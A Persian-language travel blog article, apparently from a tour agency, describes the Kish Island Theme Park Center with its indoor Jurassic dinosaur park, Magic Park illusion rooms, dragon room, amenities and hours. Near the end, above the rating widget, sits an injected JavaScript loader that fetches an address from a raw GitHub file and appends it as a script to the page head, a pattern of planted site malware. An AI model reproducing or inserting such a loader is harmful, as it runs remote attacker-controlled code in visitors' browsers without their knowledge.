تم پارک کیش

 • پروژه تم پارک کیش که در فروردین 1400 در زمینی به مساحت هزار و پانصد متر مربع در ساختمان نماد کیش افتتاح شده است. مدیر عامل شرکت عمران جناب آقای طیبی گفت: پارک های موضوعی یکی از جدیدترین روش های تلفیق گردشگری، تفریح و آموزش می باشد که در کشورهای مختلف بسیار رواج دارد و در جذب گردشگر کمک بسیار زیادی کرده است.

  تم پارک کیش

  امروزه پارک ژوراسیک کیش یکی از بخش های جذاب این شهر برای کودک ها به شمار می رود. این پارک یکی از علاقه مندی های کودکان و نوجوانان هم محسوب می شود که  دوست دارند از چنین محیط خلاق و شادی لذت می برند. پارک های ژوراسیک اولین بار بر اساس تقویت قوه تخیل کودکان و نوجوانان در آمریکا طراحی شد و از آنجا به  کشورهای متعددی راه باز کرد و بسیاری از کشورها  تصمیم گرفتند پارک های ژوراسیک خلاقانه ای را بسازند. پارک ژوراسیک بر محور هیجان، سرگرمی های شاد، محتواهای علمی و بازی های خلاق طراحی شده است.

  جالب است بدانید که پارک های ژوراسیک به صورت غیر مستقیم مخاطب کودک و نوجوان را جذب می کنند و به آن ها در کنار بازی و شادی آموزش می دهند. در دنیای صنعت گردشگری امروز کودکان و نوجوانان جایگاه ویژه ای دارند و هر روزه بر سرمایه گذاری های جاذبهِ گردشگری برای کودک ها و نوجوان ها افزوده می شود. در این مقاله تیم گردشگری الی گشت از جاذبه های پارک ژوراسیک کیش، بزرگترین پارک ژوراسیک سر پوشیده در خاورمیانه می گوید تا اگر به کیش سفر رفتید به این مکان جذاب هم سر بزنید.

  پارک ژوراسیک کیش کجاست؟

  اولین سوالی که کاربرها دارند این است که پارک ژوراسیک کیش کجاست؟ در پاسخ باید به شما بگوییم که پارک ژوراسیک کیش در منطقه خوبی از کیش ساخته شده است و برای رفتن به این پارک در ابتدا باید به غرب جزیره کیش بروید. در حوالی کشتی یونانی بعد از رستوران شاندیز صفدری، تابلو بزرگ تم پارک سنتر کیش را می بینید که با تهیه بلیط برای خود و فرزند دلبندتان وارد دنیای شگفتی می شوید. خوب است بدانید که پارک ژوراسیک کیش بخشی از از تم پارک سنتر کیش است و در این محوطه قرار دارد پس برای رفتن به این مجموعه هیجان انگیز باید وارد تم پارک سنتر کیش شوید.

  تعدادی فکر می کنند که تم پارک سنتر کیش از پارک ژوراسیک مجزا است. خوب است بدانید که تم پارک سنتر کیش یکی از به روزترین مجموعه های خلاق کیش برای کودک ها و نوجوانان است که از فروردین ماه سال ۱۴۰۰ فعالیت خودش را آغاز کرد. این پارک بخش وسیعی دارد  و از دو قسمت پارک ژوراسیک و پارک جادویی کیش یا همان مجیک کیش ساخته شده است. برخی از کاربرها نمی دانند که پارک ژوراسیک کیش بخش بزرگی از تم پارک سنتر کیش است و خوب است این مورد را به خاطر بسپارید.

  پارک ژوراسیک کیش کجاست؟ - الی گشت

  تم پارک سنتر  بزرگ کیش براساس قوه ی تخیل کودک و نوجوان طراحی شده است. مساحت  آن حدود ۳۵۰۰ متر مربع است. این مجموعه بزرگ از فضای تفریحی، گردشگری و آموزشی تشکیل شده است. جالب است بدانید که این مجموعه بزرگ با طراحی دویست کار گروه تشکیل شده است. این کار گروه ها از گرافیست های خلاق تصویر، مهندسین حوزه معماری، مجسمه سازان شخصیت های کارتونی و مجسمه سازان دایناسورها بوده اند. موسیقی و آهنگ بخش های مختلف تم پارک کیش از دیگر طراحی های این مجموعه بزرگ است که توسط یک کار گروه بزرگ موزیسین طراحی شده است. تم پارک سنتر کیش نه تنها برای کودک ها و نوجوان ها بلکه برای بزرگسالان هم جذاب است. برای دیدن دنیای با شادی و نشاط و آموزش حتما یکبار وارد تم پارک سنتر کیش شوید و تجربه خاطره انگیزی برای کودک خود بسازید.

  پارک ژوراسیک یا دراگون پارک کیش

  پارک ژوراسیک یا درگوان پارک کیش بزرگترین پارک سر پوشیده ژوراسیک خاورمیانه است. برای رفتن به این محوطه باید به سمت تم پارک سنتر کیش بروید. در این پارک جذاب و دیدنی قرار است به دوران ما قبل تاریخ و دوره ی زمین شناسی  ژوراسیک سفر کنید. زمانی که بر روی زمین فقط دایناسورها و دراگون ها زندگی می کردند. در دراگون پارک مجسمه های متعدد دایناسورها را می بیینید که نوع هر دایناسور کنار مجسمه اش نوشته شده است. کودک شما می تواند بر روی یک دکمه بزند و صدای دایناسورها را بشنود.

  این فعالیت برای کودک ها و نوجوان ها بسیار جذاب است. تعداد بی شماری از کودک ها با دیدن انیمیشن در مورد دراگون ها و دایناسورها اطلاعات خوبی دارند. صد ها کتاب دایناسور برای کودک ها باعث شده است که اطلاعات خوبی داشته باشند و در پارک ژوراسیک کیش گاهی از اطلاعات کودک و نوجوان خود دربارهِ انواع دایناسورها تعجب می کنید.

  مجیک پارک

  بخش دیگر از تم پارک سنتر کیش مجیک پارک است. بعد از دیدن پارک ژوراسیک کیش حتما از مجیک پارک دیدن کنید. چرا که ده ها بازی خلاق در این بخش طراحی شده است که کودک و نوجوان را به چالش می کشد. مجیک پارک از بخش های مختلفی تشکیل شده است که به دلخواه  خود می توانید یک یا چند مورد را انتخاب کنید. در این بخش کودک یا نوجوان شما می تواند دنیای بلک لایت، خطای دید، دنیای جاذبه، دنیای بی نهایت، بخش نقاشی های ۳ بعدی، اتاق perspective، اتاق خواب دیواری، اتاق سیاه و سفید و خانه وارونه  را تجربه کند. جالب است بدانید که اتاق  خطای دید پنجمین موزه برتر جهان برای کودک و نوجوان است که در این پارک قرار دارد.

  اتاق تمام آینه بخش دیگری از مجیک پارک است. این اتاق برای بزرگسال ها هم جذاب است و می توانید در قسمت مجیک پارک آن را انتخاب کنید. اتاق های آینه عبارتند از اتاق تمام آینه، اتاق با آینه های ۳۰ درجه زاویه و اتاق با آینه های اینتراکتیو  interactive است. آینه های اینتراکتیو به معنی آینه های تعاملی است که بخشی از بدن شما  و بخشی از بدن همراه تان در در قالب یک نفر نشان می دهد و بسیار برای بازدیدکنندگان جذاب است.

  اتاق اژدها در مجیک پارک

  تعدادی به اشتباه فکر می کنند که اتاق اژدها در قسمت پارک ژوراسیک کیش است اما خوب است بدانید که این اتاق در قسمت مجیک پارک تم سنتر پارک کیش قرار دارد. با بازید اتاق اژدها در مجیک پارک هیجان زیادی را کودک و نوجوان شما تجربه می کند. در این بخش دو مجسمه دایناسور عظیم جثه به طول شش متر وجود دارد. این مجسمه از آن جا جذاب است که از دهانش دود و آتش خارج می شود. این بخش برای کودک های زیر شش سال ترسناک است و اگر کودک بالای شش سال دارید به اتاق اژدها ببرید تا دنیای از شور و هیجان را با دایناسورها تجربه کند.

  مزایای دیدن تم پارک سنتر کیش

  مزایای دیدن تم پارک سنتر کیش کم نیستند. بسیاری از کودک ها با دیدن تم پارک سنتر با دنیای گذشته و دوره های زمین شناسی با زبان ساده و روان به صورت غیر مستقیم آشنا می شوند و جدا از آن در  این پارک با حضور انواع مجسمه های دایناسورها  دنیایی از هیجان را تجربه می کنند و به بازی کردن و گرفتن عکس می پردازند. در این پارک ها کتابفروشی و کارگاه های خلاقیت هم وجود دارد که پس از بازدید می توانید کودک و نوجوان خود را به  این محوطه ها هدایت کنید.

  چنین پارک های تفریحی بر مهارت های  فکر کردن، حل کردن مساله، بازی فکر کودک ها تاثیر مستقیم می گذارد‌‌. نکته ای که نباید پدر و مادرها فراموش کنند این است که بسیاری این پارک ها را فقط به جنبه سرگرمی و لذت می شناسند در صورتی که این پارک با هدف آموزش غیر مستقیم از طریق بازی و هیجان خلق شده اند. شما  بازدید پارک ژوراسیک کیش با یک تیر دو نشان می زنید هم کودک خود را بسیار خوشحال کنید و هم بر روند یادگیری و آموزش او تاثیر می گذارید.

  امکانات رفاهی پارک ژوراسیک کیش

  امکانات رفاهی پارک ژوراسیک کیش در مجموعه تم پارک سنتر کیش است. که از چندین رستوران، کافی شاپ تشکیل شده است و هم چنین دارای دو بخش آتلیه عکس کودک و نوجوان است. جدا از آن هم دارای فروشگاه اسباب بازی، فروشگاه  لیوان های ماگ دار با طرح دایناسور و تیشرت با تصویر  انواع دایسناسورها است که می توانید هدیه ای جذابی را از این بخش برای کودک خود در نظر بگیرید.

  ساعات کاری مجموعه تم پارک سنتر کیش

  ساعات کاری مجموعه تیم پارک سنتر کیش از ۱۱ الی ۱۹ است. شما می توانید در این بخش از پارک ژوراسیک کیش و‌ مجیک پارک بازدید کنید. اگر بخواهید از تمام آیتم های مجموعه استفاده کنید شما باید حداقل ۵ الی ۶ ساعت زمان بگذارید. اگر بخواهید فقط چندین بخش را در هر مجموعه را ببینید خوب است سه ساعت زمان را در نظر بگیرید.  برای اطلاع دقیق از هزینه بلیط سایت های که بلیط مجموعه را می فروشند سرچ کنید و از قیمت به روز آن مطلع شوید.

  جمع بندی درباره تم پارک سنتر 

  در این مقاله پارک ژوراسیک کیش بزرگترین مجموعه پارک سرپوشیده خاورمیانه معرفی شد. ‌پارک ژوراسیک کیش بخش از تم پارک بزرگ کیش است که دنیای شادی و نشاط و هیجان آموزش را برای کودک ها و نوجوان ها مهیا می کند. مجیک پارک از ده  قسمت تشکیل شده است که اتاق خطای دید آینه بخش جذابی برای بزرگسال ها هم است. یادتان باشد بازی فقط مختص کودک ها نیست و برای تقویت حافظه و مغز هم بزرگسالان نیاز به بازی دارند. در بخش تم پارک سنتر کیش بازی های مختلفی برای کودک ها و نوجوان ها و بزرگسال طراحی شده است و  خوب است که یکبار آن را تجربه کنید.

  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

  امتیاز شما:

  میانگین امتیازات ۵ از ۵
  از مجموع ۱ رای

  دیدگاهتان را بنویسید